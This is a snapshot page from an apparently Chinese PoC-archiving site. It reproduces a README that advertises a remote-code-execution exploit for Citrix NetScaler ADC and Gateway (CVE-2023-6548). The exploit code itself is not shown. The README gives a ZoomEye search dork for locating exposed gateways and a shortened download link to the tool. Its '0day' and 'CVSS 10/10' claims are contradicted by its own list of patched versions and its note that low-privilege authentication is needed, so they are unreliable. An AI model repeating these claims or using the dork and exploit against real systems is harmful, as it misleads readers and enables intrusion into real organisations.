Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-6548 PoC — Citrix Systems ADC and NetScaler Gateway 代码注入漏洞

Source
Associated Vulnerability
Title:Citrix Systems ADC and NetScaler Gateway 代码注入漏洞 (CVE-2023-6548)
Description:Citrix Systems ADC and NetScaler Gateway是美国思杰系统(Citrix Systems)公司的一款应用交付控制器。 Citrix Systems ADC and NetScaler Gateway存在代码注入漏洞,该漏洞源于存在代码注入漏洞。受影响的产品和版本:NetScaler ADC和NetScaler Gateway 14.1-12.35之前的14.1版本,13.1-51.15之前的13.1版本,13.0-92.21之前的13.0版本,NetScaler ADC
Description
0day for Citrix Netscaler ADC and NetScaler Gateway latest versions
Readme
# CVE-2023-6548-POC
0day for Citrix Netscaler ADC and NetScaler Gateway latest versions

## 🔥 **CVSS: 10/10**

## Description
A vulnerability has been discovered in Citrix Gateway and Citrix ADC (formerly known as NetScaler ADC) that, if exploited, could lead to remote code execution on Management Interface.

## Exploit details
The exploit implements an improper code generation control vulnerability ("code injection") in NetScaler ADC and NetScaler Gateway and allows access (RCE) to an NSIP, CLIP, or SNIP with a management interface to perform authenticated (low-privilege) remote code execution on the management interface.


![image](https://github.com/Roonye660/CVE-2023-6548-POC/assets/162106909/5e46892a-1b70-4bbf-ad4f-b41595edf9ca)

## Zoomeye dork
```app:"Citrix NetScaler Gateway"```

## Vulnerable versions: 
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35<br>
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15<br>
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21<br>
NetScaler ADC 13.1-FIPS before 13.1-37.176<br>
NetScaler ADC 12.1-FIPS before 12.1-55.302<br>
NetScaler ADC 12.1-NDcPP before 12.1-55.302<br>

## Download
[Download here](https://t.ly/vZp93)

## Date of published: 2024/03/04

## Contact
Author: Roonye660

For education purposes only.
File Snapshot

[4.0K] /data/pocs/ae7248dd2a3c218e79fb3e5d646c22273f892335 ├── [4.4K] CVE-2023-6548-RCE.py └── [1.3K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.